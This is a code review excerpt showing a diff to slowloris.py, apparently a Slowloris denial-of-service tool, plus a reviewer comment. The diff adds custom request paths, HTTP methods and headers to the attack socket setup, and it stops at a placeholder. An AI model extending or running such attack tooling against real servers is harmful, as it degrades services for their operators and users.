slowloris.py

```diff
@@ -157,18 +117,37 @@ def init_socket(ip: str):
         ctx.verify_mode = ssl.CERT_NONE
         s = ctx.wrap_socket(s, server_hostname=args.host)
 
-    s.connect((ip, args.port))
+    try:
+        s.connect((ip, port))
+    except socket.error as e:
+        logging.error("Failed to connect to %s:%s - %s", ip, port, e)
+        sys.exit(1)
 
-    s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
+    request_path = "/" if args.attack_pattern == "default" else generate_custom_path()
+    
+    s.send_line(f"{args.method} {request_path} HTTP/1.1")
 
     ua = user_agents[0]
     if args.randuseragent:
         ua = random.choice(user_agents)
 
     s.send_header("User-Agent", ua)
     s.send_header("Accept-language", "en-US,en,q=0.5")
+    if args.headers:
+        custom_headers = args.headers.split(',')
+        for header in custom_headers:
+            header_name, header_value = header.split(':')
+            s.send_header(header_name.strip(), header_value.strip())
     return s
 
+def generate_custom_path():
+    if args.attack_pattern == "random_path":
+        return f"/{random.randint(0, 2000)}"
+    elif args.attack_pattern == "custom":
+        # Add your custom attack pattern logic here
```

Comment:
Is the user expected to edit the string? Why even have config/args if the user is supposed to edit code